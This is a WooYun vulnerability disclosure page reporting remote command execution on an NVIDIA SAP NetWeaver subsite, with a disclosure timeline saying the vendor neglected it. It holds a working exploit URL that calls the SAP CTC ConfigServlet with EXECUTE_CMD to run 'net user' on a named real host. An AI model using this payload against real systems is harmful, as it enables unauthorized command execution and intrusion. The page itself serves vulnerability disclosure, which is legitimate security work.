Current:WooYun >> vulnerability information

Overview Followers (0) + Follow

WooYun-2013-00041

: NVIDIA a subsite SAP NETWEAVER remote command execution

NVIDIA

Finger

: 2013-11-21 22:14

: 2014-01-05 22:15

: Arbitrary command/code execution

: high

: 20

: unable to contact the vendor or actively neglected by the vendor

http://www.wooyun.org

command execution remote

0collected by people collect


Details

Disclosure time-line:

2013-11-21: Contacting and waiting for the vendor to claim, details not opened to the public
2014-01-05: Vendor has neglected the vulnerability, details opened to the public

Abstract:

NVIDIA a subsite SAP NETWEAVER remote command execution

Details:

url:

https://nvcare.nvidia.com



https://nvcare.nvidia.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=net user

Proofs of concept:

QQ截图20131121220338.jpg

Solutions:

Copyright:Please repost with source Finger@Wooyun


Response

Unable to contact the vendor or has been regected


review the vulnerability:

Give your review of the vulnerability in order to reflect its value better. Reviews can include the subjectivity, complecity, as well as the scholar value of the information.

(less than 3 comments):
You need to sign in to comment
100%
0%
0%
0%
0%

Comments

Want to comment? Please sign in .